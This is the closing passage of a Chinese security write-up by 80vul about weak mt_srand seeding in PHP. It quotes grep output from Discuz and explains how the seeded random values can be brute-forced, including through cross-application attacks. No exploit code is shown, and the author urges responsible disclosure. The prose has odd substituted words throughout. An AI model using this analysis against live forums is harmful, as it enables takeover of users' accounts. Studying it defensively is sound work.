16. ./include/discuzcode.func.php-32- @include DISCUZ_ROOT.'./forumdata/cache/cache_bbcodes.php';
17. ./include/discuzcode.func.php-33-}
18. ./include/discuzcode.func.php-34-
19. ./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);
20. ./include/discuzcode.func.php-36-
21. ./include/discuzcode.func.php-37-function attachtag($pid, $aid, &$postlist) {
22. ./include/discuzcode.func.php-38- global $attachrefcheck, $thumbstatus, $extcredits, $creditstrans, $ftp, $exthtml;
23. ./include/discuzcode.func.php-39- $attach = $postlist[$pid]['attachments'][$aid];
24. ./include/discuzcode.func.php-40- if($attach['attachimg']) {

有两个文件用到了mt_srand()，第1是在./include/global.func.php的随机函数random()里：

PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);

判断了版本，若是是PHP_VERSION > '4.2.0'使用php自己默认的播种。从上一章里的分析咱们能够看得出来，使用php自己默认的播种的分程序两种状况：

1) 'Cross Application Attacks' 这个思路是只要目标上有使用使用的程序里定义了相似mt_srand((double)microtime() * 1000000)的播种的话，又颇有可能被暴力。在dz这里不须要Cross Application，由于他自己有文件就定义了，就是上面的第2个文件：

./include/discuzcode.func.php:35:mt_srand((double)microtime() * 1000000);

这里咱们确定dz是存在这个漏洞的，文章给出来的exp也就是基于这个的。（具体exp利用的流程有兴趣的能够本身分析下]）

2) 有的人认为若是没有mt_srand((double)microtime() * 1000000);这里的定义，那么dz就不存在漏洞，这个是不正确的。首先你不能够保证别人使用的其余应用程序没有定义，再次不利用'Cross Application Attacks'，5.2.6>php>4.2.0 php自己默认播种的算法也不是很强悍（分析详见上），也是有能够暴力出来，只是速度要慢一点。

后话

本文是80vul的三大马甲：80vul-A，80vul-B，80vul-C集 体智慧的结晶，尤为是80vul-B贡献了很多新发现。另外须要感谢的是文章里提到的那些漏洞的发现者，没有他们的成果也就没有本文。本文没有写“参 考”，由于本文是一个总结性的文挡，有太多的链接须要提供限于篇幅就没有一一列举，有心的读者能够自行google。另外本来没有打算公布此文，由于里面 包含了太多应用程序的0day，并且有太多的不尊重别人成果的人，总是利用从别人那学到的技术来炫耀，甚至牟取利益。在这里咱们但愿你能够在本文里学到些 东西，更加但愿若是经过本文你找到了某些应用程序的0day，请低调处理，或者直接提交给官方修补，谢谢你们！！

by http://80vul.com

附录

• http://bbs.phpchina.com/attachment.php?aid=22294
• http://www.php-security.org/
• http://bugs.php.net/bug.php?id=40114